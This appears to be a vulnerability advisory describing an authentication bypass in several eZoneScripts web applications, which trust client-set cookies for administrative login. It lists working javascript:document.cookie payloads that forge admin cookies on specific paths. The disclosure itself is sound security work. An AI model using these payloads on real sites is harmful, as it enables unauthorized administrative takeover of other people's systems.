Authentication-Bypass Vulnerability in eZoneScripts Banner Exchange Website, Adult Banner Exchange Website, Apartment Search Script, phpMiniSite Script, and Classified Ultra Script
eZoneScripts Banner Exchange Website, Adult Banner Exchange Website, Apartment Search Script, phpMiniSite Script, and Classified Ultra Script are prone to an authentication-bypass vulnerability because they fail to adequately verify user-supplied input used for cookie-based authentication. Attackers can exploit this vulnerability to gain administrative access to the affected application, which may aid in further attacks. The following example cookie data is available: Banner Exchange Website and Adult Banner Exchange Website: javascript:document.cookie="bannerexchangename=admin; path=/"; javascript:document.cookie="bannerexchangerand=905; path=/"; Classified Ultra Script: javascript:document.cookie="AdminPass=1; path=/productdemos/ClassifiedUltra/Site_Admin/"; Apartment Search Script: javascript:document.cookie="SiteAdminPass=1; path=/productdemos/ApartmentSearch/Site_Admin/"; phpMiniSite Script: javascript:document.cookie="auth=fook; path=/";